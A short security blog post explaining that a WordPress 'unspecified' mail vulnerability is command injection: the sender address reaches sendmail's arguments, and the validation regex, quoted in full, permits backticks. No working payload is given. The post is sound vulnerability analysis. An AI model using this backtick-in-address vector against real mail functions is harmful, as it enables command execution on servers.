WordPress Email Newsletter Unspecified Security Vulnerability
I was skimming through securityfocus.com when saw a post on “WordPress Unspecified Mail Vulnerability.” The complete lack of details was interesting so I dug up the changelist.
In this case ‘unspecified’ means ‘command execution.’ From the original version, it seems that the this->Sender is set equal to the address via SetFrom. Then in SendMail it gets used as in the arguments passed to the sendmail.
This vulnerability would only be of use to someone that is a partial admin. Also it is limited to only commands that can pass the following RegEx. Spaces are not allowed but backtick appears are permitted, making this exploitable on Nix enviroments.
preg_match(‘/^(?:[\w\!\#\$\%\&\'\*\+\-\/\=\?\^\`\{\|\}\~]+\.)*[\w\!\#\$\%\&\'\*\+\-\/\=\?\^\`\{\|\}\~]+@(?:(?:(?:[a-zA-Z0-9_](?:[a-zA-Z0-9_\-](?!\.)){0,61}[a-zA-Z0-9_-]?\.)+[a-zA-Z0-9_](?:[a-zA-Z0-9_\-](?!$)){0,61}[a-zA-Z0-9_]?)|(?:\[(?:(?:[01]?\d{1,2}|2[0-4]\d|25[0-5])\.){3}(?:[01]?\d{1,2}|2[0-4]\d|25[0-5])\]))$/’, $address);
Add Everyone Group to a Directory and Registry Key Creating XSS Payloads with only Symbols